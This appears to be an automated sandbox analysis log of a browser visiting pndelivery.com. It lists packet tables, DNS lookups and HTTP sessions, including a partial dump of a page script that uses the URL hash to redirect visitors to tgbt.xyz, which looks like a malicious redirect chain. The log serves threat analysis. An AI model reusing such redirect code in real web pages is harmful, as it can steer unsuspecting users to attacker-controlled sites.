        Apr 29, 2024 10:30:01.476063013 CEST4434974123.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.476124048 CEST49741443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.549424887 CEST49742443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.549455881 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.549597979 CEST49742443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.550122023 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.550174952 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.550235033 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.551110029 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.551126957 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.551695108 CEST49742443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.551712990 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.593833923 CEST49741443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.593859911 CEST4434974123.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.593879938 CEST49741443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.593892097 CEST4434974123.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.784252882 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.787818909 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.789670944 CEST49744443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.789710999 CEST4434974423.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.789797068 CEST49744443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.792640924 CEST49744443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.792654991 CEST4434974423.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.793308020 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.793339014 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.793571949 CEST49742443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.793597937 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.794451952 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.794523001 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.795247078 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.795330048 CEST49742443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.805042982 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.805547953 CEST49742443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.805569887 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.805649042 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:01.806025982 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:01.806049109 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:02.012118101 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:02.012139082 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:02.012192965 CEST49742443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:02.012233019 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:02.016633987 CEST4434974423.203.40.158192.168.2.4
        Apr 29, 2024 10:30:02.016711950 CEST49744443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:02.019336939 CEST49744443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:02.019346952 CEST4434974423.203.40.158192.168.2.4
        Apr 29, 2024 10:30:02.019586086 CEST4434974423.203.40.158192.168.2.4
        Apr 29, 2024 10:30:02.021372080 CEST49744443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:02.068121910 CEST4434974423.203.40.158192.168.2.4
        Apr 29, 2024 10:30:02.251044989 CEST4434974423.203.40.158192.168.2.4
        Apr 29, 2024 10:30:02.251218081 CEST4434974423.203.40.158192.168.2.4
        Apr 29, 2024 10:30:02.251287937 CEST49744443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:04.077096939 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:04.077132940 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:04.077214003 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:04.134109020 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:04.134135008 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:04.135413885 CEST49744443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:04.135442972 CEST4434974423.203.40.158192.168.2.4
        Apr 29, 2024 10:30:04.308134079 CEST49672443192.168.2.4173.222.162.32
        Apr 29, 2024 10:30:04.308197021 CEST44349672173.222.162.32192.168.2.4
        Apr 29, 2024 10:30:04.619852066 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:04.619955063 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:04.634923935 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:04.634938002 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:04.635174990 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:04.727104902 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:05.269804001 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:05.312122107 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586144924 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586170912 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586179018 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586213112 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586230040 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586237907 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586405993 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:05.586406946 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:05.586421013 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586430073 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586457014 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586464882 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.586522102 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:05.586522102 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:05.794759989 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:30:05.794950962 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:30:05.795012951 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:30:05.885324001 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:05.885353088 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:05.885365009 CEST49745443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:05.885380030 CEST4434974520.114.59.183192.168.2.4
        Apr 29, 2024 10:30:07.167562008 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:30:07.167604923 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:30:07.474348068 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:07.474559069 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:07.474633932 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:07.477390051 CEST49743443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:07.477447987 CEST44349743172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:07.588598013 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:07.588655949 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:07.588773966 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:07.588956118 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:07.588987112 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:07.822731972 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:07.823045969 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:07.823060036 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:07.824090958 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:07.824234009 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:07.825191975 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:07.825247049 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:07.825378895 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:07.825383902 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:07.866302013 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:08.051681995 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:08.051748991 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:08.052037001 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:08.052112103 CEST4434975135.190.80.1192.168.2.4
        Apr 29, 2024 10:30:08.052150965 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:08.052150965 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:08.052653074 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:08.052685022 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:08.052717924 CEST49751443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:08.052823067 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:08.053039074 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:08.053055048 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:08.280915976 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:08.335571051 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:09.498435020 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:09.498464108 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:09.499969006 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:09.553992987 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:09.554198980 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:09.554207087 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:09.600111961 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:09.600994110 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:09.785913944 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:09.786106110 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:09.786173105 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:09.885716915 CEST49752443192.168.2.435.190.80.1
        Apr 29, 2024 10:30:09.885746956 CEST4434975235.190.80.1192.168.2.4
        Apr 29, 2024 10:30:16.774389029 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:16.774463892 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:16.774549007 CEST49742443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:17.150897026 CEST49742443192.168.2.4172.67.218.241
        Apr 29, 2024 10:30:17.150960922 CEST44349742172.67.218.241192.168.2.4
        Apr 29, 2024 10:30:42.404105902 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:42.404151917 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:42.404230118 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:42.404629946 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:42.404645920 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:42.884931087 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:42.885293961 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:42.888899088 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:42.888911963 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:42.889120102 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:42.897892952 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:42.940123081 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:43.356271982 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:43.356298923 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:43.356372118 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:43.356424093 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:43.356463909 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:43.356479883 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:43.356484890 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:43.356530905 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:43.356618881 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:43.361335993 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:43.361335993 CEST49753443192.168.2.420.114.59.183
        Apr 29, 2024 10:30:43.361360073 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:43.361371994 CEST4434975320.114.59.183192.168.2.4
        Apr 29, 2024 10:30:55.348131895 CEST49755443192.168.2.4172.217.2.36
        Apr 29, 2024 10:30:55.348174095 CEST44349755172.217.2.36192.168.2.4
        Apr 29, 2024 10:30:55.348236084 CEST49755443192.168.2.4172.217.2.36
        Apr 29, 2024 10:30:55.348753929 CEST49755443192.168.2.4172.217.2.36
        Apr 29, 2024 10:30:55.348767996 CEST44349755172.217.2.36192.168.2.4
        Apr 29, 2024 10:30:55.581254959 CEST44349755172.217.2.36192.168.2.4
        Apr 29, 2024 10:30:55.581563950 CEST49755443192.168.2.4172.217.2.36
        Apr 29, 2024 10:30:55.581615925 CEST44349755172.217.2.36192.168.2.4
        Apr 29, 2024 10:30:55.581919909 CEST44349755172.217.2.36192.168.2.4
        Apr 29, 2024 10:30:55.582240105 CEST49755443192.168.2.4172.217.2.36
        Apr 29, 2024 10:30:55.582304955 CEST44349755172.217.2.36192.168.2.4
        Apr 29, 2024 10:30:55.633090019 CEST49755443192.168.2.4172.217.2.36
        Apr 29, 2024 10:30:57.445688009 CEST4972380192.168.2.472.21.81.240
        Apr 29, 2024 10:30:57.445777893 CEST4972480192.168.2.472.21.81.240
        Apr 29, 2024 10:30:57.555274963 CEST804972372.21.81.240192.168.2.4
        Apr 29, 2024 10:30:57.555299044 CEST804972472.21.81.240192.168.2.4
        Apr 29, 2024 10:30:57.555366039 CEST4972480192.168.2.472.21.81.240
        Apr 29, 2024 10:30:57.555370092 CEST4972380192.168.2.472.21.81.240
        Apr 29, 2024 10:31:05.590985060 CEST44349755172.217.2.36192.168.2.4
        Apr 29, 2024 10:31:05.591075897 CEST44349755172.217.2.36192.168.2.4
        Apr 29, 2024 10:31:05.591140985 CEST49755443192.168.2.4172.217.2.36
        Apr 29, 2024 10:31:07.150789976 CEST49755443192.168.2.4172.217.2.36
        Apr 29, 2024 10:31:07.150856018 CEST44349755172.217.2.36192.168.2.4
        TimestampSource PortDest PortSource IPDest IP
        Apr 29, 2024 10:29:51.001728058 CEST53531971.1.1.1192.168.2.4
        Apr 29, 2024 10:29:51.006207943 CEST53518521.1.1.1192.168.2.4
        Apr 29, 2024 10:29:51.661778927 CEST53594651.1.1.1192.168.2.4
        Apr 29, 2024 10:29:54.203515053 CEST6537153192.168.2.41.1.1.1
        Apr 29, 2024 10:29:54.207912922 CEST5703753192.168.2.41.1.1.1
        Apr 29, 2024 10:29:54.898004055 CEST53570371.1.1.1192.168.2.4
        Apr 29, 2024 10:29:55.007589102 CEST5684053192.168.2.41.1.1.1
        Apr 29, 2024 10:29:55.007968903 CEST5735453192.168.2.41.1.1.1
        Apr 29, 2024 10:29:55.117799997 CEST53568401.1.1.1192.168.2.4
        Apr 29, 2024 10:29:55.118149996 CEST53573541.1.1.1192.168.2.4
        Apr 29, 2024 10:29:55.225727081 CEST6547253192.168.2.41.1.1.1
        Apr 29, 2024 10:29:55.393984079 CEST53654721.1.1.1192.168.2.4
        Apr 29, 2024 10:29:55.394022942 CEST53653711.1.1.1192.168.2.4
        Apr 29, 2024 10:30:01.385240078 CEST6281653192.168.2.41.1.1.1
        Apr 29, 2024 10:30:01.385678053 CEST5738053192.168.2.41.1.1.1
        Apr 29, 2024 10:30:01.545241117 CEST53628161.1.1.1192.168.2.4
        Apr 29, 2024 10:30:01.548517942 CEST53573801.1.1.1192.168.2.4
        Apr 29, 2024 10:30:07.476759911 CEST5559153192.168.2.41.1.1.1
        Apr 29, 2024 10:30:07.477054119 CEST5753953192.168.2.41.1.1.1
        Apr 29, 2024 10:30:07.587430000 CEST53575391.1.1.1192.168.2.4
        Apr 29, 2024 10:30:07.587595940 CEST53555911.1.1.1192.168.2.4
        Apr 29, 2024 10:30:09.599448919 CEST138138192.168.2.4192.168.2.255
        Apr 29, 2024 10:30:14.063733101 CEST53630901.1.1.1192.168.2.4
        Apr 29, 2024 10:30:32.982127905 CEST53606041.1.1.1192.168.2.4
        Apr 29, 2024 10:30:50.574665070 CEST53602471.1.1.1192.168.2.4
        Apr 29, 2024 10:30:55.989187956 CEST53618851.1.1.1192.168.2.4
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Apr 29, 2024 10:29:54.203515053 CEST192.168.2.41.1.1.10x2106Standard query (0)pndelivery.comA (IP address)IN (0x0001)false
        Apr 29, 2024 10:29:54.207912922 CEST192.168.2.41.1.1.10x3555Standard query (0)pndelivery.com65IN (0x0001)false
        Apr 29, 2024 10:29:55.007589102 CEST192.168.2.41.1.1.10xdd2bStandard query (0)www.google.comA (IP address)IN (0x0001)false
        Apr 29, 2024 10:29:55.007968903 CEST192.168.2.41.1.1.10xe7a7Standard query (0)www.google.com65IN (0x0001)false
        Apr 29, 2024 10:29:55.225727081 CEST192.168.2.41.1.1.10x3c71Standard query (0)pndelivery.comA (IP address)IN (0x0001)false
        Apr 29, 2024 10:30:01.385240078 CEST192.168.2.41.1.1.10x2223Standard query (0)tgbt.xyzA (IP address)IN (0x0001)false
        Apr 29, 2024 10:30:01.385678053 CEST192.168.2.41.1.1.10x8cfaStandard query (0)tgbt.xyz65IN (0x0001)false
        Apr 29, 2024 10:30:07.476759911 CEST192.168.2.41.1.1.10x724bStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
        Apr 29, 2024 10:30:07.477054119 CEST192.168.2.41.1.1.10x3741Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Apr 29, 2024 10:29:55.117799997 CEST1.1.1.1192.168.2.40xdd2bNo error (0)www.google.com172.217.2.36A (IP address)IN (0x0001)false
        Apr 29, 2024 10:29:55.118149996 CEST1.1.1.1192.168.2.40xe7a7No error (0)www.google.com65IN (0x0001)false
        Apr 29, 2024 10:29:55.393984079 CEST1.1.1.1192.168.2.40x3c71No error (0)pndelivery.com101.99.90.110A (IP address)IN (0x0001)false
        Apr 29, 2024 10:29:55.394022942 CEST1.1.1.1192.168.2.40x2106No error (0)pndelivery.com101.99.90.110A (IP address)IN (0x0001)false
        Apr 29, 2024 10:30:01.545241117 CEST1.1.1.1192.168.2.40x2223No error (0)tgbt.xyz172.67.218.241A (IP address)IN (0x0001)false
        Apr 29, 2024 10:30:01.545241117 CEST1.1.1.1192.168.2.40x2223No error (0)tgbt.xyz104.21.24.133A (IP address)IN (0x0001)false
        Apr 29, 2024 10:30:01.548517942 CEST1.1.1.1192.168.2.40x8cfaNo error (0)tgbt.xyz65IN (0x0001)false
        Apr 29, 2024 10:30:05.402162075 CEST1.1.1.1192.168.2.40x9805No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
        Apr 29, 2024 10:30:05.402162075 CEST1.1.1.1192.168.2.40x9805No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
        Apr 29, 2024 10:30:07.587595940 CEST1.1.1.1192.168.2.40x724bNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
        Apr 29, 2024 10:30:18.400553942 CEST1.1.1.1192.168.2.40x87b9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
        Apr 29, 2024 10:30:18.400553942 CEST1.1.1.1192.168.2.40x87b9No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
        Apr 29, 2024 10:30:48.162580013 CEST1.1.1.1192.168.2.40xaac4No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
        Apr 29, 2024 10:30:48.162580013 CEST1.1.1.1192.168.2.40xaac4No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
        Apr 29, 2024 10:31:05.353511095 CEST1.1.1.1192.168.2.40x2a7eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
        Apr 29, 2024 10:31:05.353511095 CEST1.1.1.1192.168.2.40x2a7eNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
        • pndelivery.com
        • https:
          • tgbt.xyz
        • fs.microsoft.com
        • slscr.update.microsoft.com
        • a.nel.cloudflare.com
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.449739101.99.90.1104434600C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        2024-04-29 08:30:00 UTC688OUTGET /product/grandmas-berry-muffins/ HTTP/1.1
        Host: pndelivery.com
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        sec-ch-ua-platform: "Windows"
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        2024-04-29 08:30:01 UTC159INHTTP/1.1 200 OK
        Date: Mon, 29 Apr 2024 08:29:31 GMT
        Server: Apache
        Connection: close
        Transfer-Encoding: chunked
        Content-Type: text/html; charset=UTF-8
        2024-04-29 08:30:01 UTC465INData Raw: 31 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 76 61 72 20 68 61 73 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 0d 0a 20 20 69 66 28 68 61 73 68 20 21 3d
        Data Ascii: 1ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head></head></body><script> var hash = window.location.hash; if(hash !=
        2024-04-29 08:30:01 UTC72INData Raw: 34 32 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 22 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a
        Data Ascii: 42<script type="text/javascript">window.location.href = ""</script>
        2024-04-29 08:30:01 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.44974123.203.40.158443
        TimestampBytes transferredDirectionData
        2024-04-29 08:30:01 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        User-Agent: Microsoft BITS/7.8
        Host: fs.microsoft.com
        2024-04-29 08:30:01 UTC466INHTTP/1.1 200 OK
        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
        Content-Type: application/octet-stream
        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
        Server: ECAcc (chd/0790)
        X-CID: 11
        X-Ms-ApiVersion: Distribute 1.2
        X-Ms-Region: prod-eus-z1
        Cache-Control: public, max-age=81201
        Date: Mon, 29 Apr 2024 08:30:01 GMT
        Connection: close
        X-CID: 2


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.449743172.67.218.2414434600C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        2024-04-29 08:30:01 UTC726OUTGET /bf27fe88-dbfa-41ad-98d7-d1eb92d995bc/c9YMDpstwYbAHlgdSi HTTP/1.1
        Host: tgbt.xyz
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        sec-ch-ua-platform: "Windows"
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Sec-Fetch-Site: cross-site
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Dest: document
        Referer: https://pndelivery.com/
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        2024-04-29 08:30:07 UTC719INHTTP/1.1 500 Internal Server Error
        Date: Mon, 29 Apr 2024 08:30:07 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Access-Control-Allow-Origin: *
        Access-Control-Allow-Methods: GET, POST, OPTIONS
        Access-Control-Allow-Headers: Content-Type
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xHsZbEt%2BEQb8tkMtTf3b9d495RCkfyp%2BI3J1I8%2FUdUBlcjCQBo0Egs3hZgK%2FWhHrXH%2F8kr5vH1M%2B3MLQXOGO1rpXTvv8DFLd0PgyI84Q5Y4LTjC08PkFpIul3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 87bded7e68e1e25d-ORD
        alt-svc: h3=":443"; ma=86400
        2024-04-29 08:30:07 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.44974423.203.40.158443
        TimestampBytes transferredDirectionData
        2024-04-29 08:30:02 UTC239OUTGET /fs/windows/config.json HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
        Range: bytes=0-2147483646
        User-Agent: Microsoft BITS/7.8
        Host: fs.microsoft.com
        2024-04-29 08:30:02 UTC530INHTTP/1.1 200 OK
        Content-Type: application/octet-stream
        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
        ApiVersion: Distribute 1.1
        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
        X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
        Cache-Control: public, max-age=81188
